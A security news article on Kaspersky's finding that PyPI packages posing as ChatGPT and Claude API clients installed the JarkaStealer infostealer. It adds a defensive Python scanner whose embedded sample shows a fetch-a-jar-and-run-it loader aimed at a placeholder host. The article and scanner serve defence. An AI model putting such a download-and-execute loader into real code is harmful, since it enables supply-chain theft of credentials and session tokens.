Malicious packages on the Python Package Index (PyPI), claiming to provide API access to OpenAI’s ChatGPT and Anthropic’s Claude AI models, were discovered by Kaspersky researchers to contain the JarkaStealer infostealer malware, the cybersecurity company said in a blog post Thursday.
The packages, named “gptplus” and “claudeai-eng,” were both uploaded by a user called “Xeroline” in November 2023 and were each installed more than 1,700 times by users in more than 30 countries prior to their removal from PyPI, the researchers said.
A demo version of ChatGPT was included in the packages to make them appear as though they were providing the expected functionality, but in the background, the “__init__.py” file included in the package would download the Java archive “JavaUpdater.jar” from a GitHub repository.
This Java archive contained the JarkaStealer malware, a malware-as-a-service (MaaS) infostealer that is designed to collect system information, data from browsers including Google Chrome and Microsoft Edge, session tokens from applications like Telegram and Discord, and screenshots of the victim’s system.
The malware checks if Java is installed on the victim’s machine and installs the Java Runtime Environment (JRE) from Dropbox if needed. It then executes the stealer, which collects the victim’s information, archives it, transmits it to an attacker-controlled server and then deletes it from the victim’s system, the Kaspersky researchers explained.
While JarkaStealer’s creators sell it as a MaaS offering through Telegram, the malware’s source code has also been leaked on GitHub, the researchers noted. JarkaStealer does not have any persistence mechanisms and only launches when the gptplus or claudeai-eng packages are run, so users who may have installed the fake AI packages can safely remove them along with the stealer.
Users who believe they may have installed the malicious packages should also reset or reissue any passwords and session tokens that could have been compromised by JarkaStealer. The discovery of these packages highlights the risks to software supply chains posed by threat actor activity on open-source repositories like PyPI.
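For defenders checking an environment, the following added example (not code from Kaspersky or from the packages themselves) looks for the two reported package names and statically scans a package’s “__init__.py” source for the download-then-execute pattern described above. The module and function lists, the helper names and the sample source are assumptions constructed for illustration.

```python
import ast
import re
from importlib import metadata

REPORTED = {"gptplus", "claudeai-eng"}  # package names from the article
# Heuristic sets below are assumptions of this example, not Kaspersky's rules.
NET_MODULES = {"urllib", "requests", "httpx", "socket"}
EXEC_MODULES = {"subprocess", "os"}
EXEC_ATTRS = {"system", "popen", "Popen", "run", "call", "check_call", "check_output"}

def reported_installed(names=None):
    """Return reported package names found among installed distributions."""
    if names is None:
        names = [d.metadata.get("Name", "") for d in metadata.distributions()]
    # PEP 503 style normalisation so "claudeai_eng" matches "claudeai-eng".
    normalized = {re.sub(r"[-_.]+", "-", n or "").lower() for n in names}
    return sorted(normalized & REPORTED)

def scan_init_source(source):
    """Flag source that imports a network module and calls a process launcher."""
    imported, exec_lines, jar_refs = set(), [], set()
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Import):
            imported.update(alias.name.split(".")[0] for alias in node.names)
        elif isinstance(node, ast.ImportFrom) and node.module:
            imported.add(node.module.split(".")[0])
        elif isinstance(node, ast.Call) and isinstance(node.func, ast.Attribute):
            if node.func.attr in EXEC_ATTRS:
                exec_lines.append(node.lineno)
        elif isinstance(node, ast.Constant) and isinstance(node.value, str):
            if node.value.lower().endswith(".jar"):
                jar_refs.add(node.value)
    network = bool(imported & NET_MODULES)
    executes = bool(imported & EXEC_MODULES) and bool(exec_lines)
    return {"network": network, "executes": executes,
            "exec_lines": sorted(exec_lines), "jar_refs": sorted(jar_refs),
            "suspicious": network and executes}

# Constructed sample, parsed as text and never executed.
SAMPLE_INIT = '''
import subprocess, urllib.request
urllib.request.urlretrieve("https://example.invalid/JavaUpdater.jar", "JavaUpdater.jar")
subprocess.Popen(["java", "-jar", "JavaUpdater.jar"])
'''

if __name__ == "__main__":
    print("reported packages installed:", reported_installed())
    print(scan_init_source(SAMPLE_INIT))
```

A hit from the scanner is a prompt for manual review rather than a verdict, since legitimate packages also combine network and subprocess calls.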
“We advise organizations to implement stringent verification and integrity checks to ensure the legitimacy and security of the software and dependencies they use, particularly when integrating exciting new technologies like AI,” Leonid Bezvershenko, security researcher at Kaspersky’s Global Research and Analysis Team (GReAT), said in a statement.
The packages were discovered by Kaspersky GReAT using its automated system for monitoring open-source repositories. The uploading of malicious packages disguised as legitimate tools is not uncommon on such repositories, with recent cases including the discovery of a PyPI package imitating the Fabric SSH automation library that was designed to steal AWS credentials, and the use of npm packages disguised as the Ethereum development utility Hardhat by North Korean threat actor Stressed Pungsan to compromise Windows systems.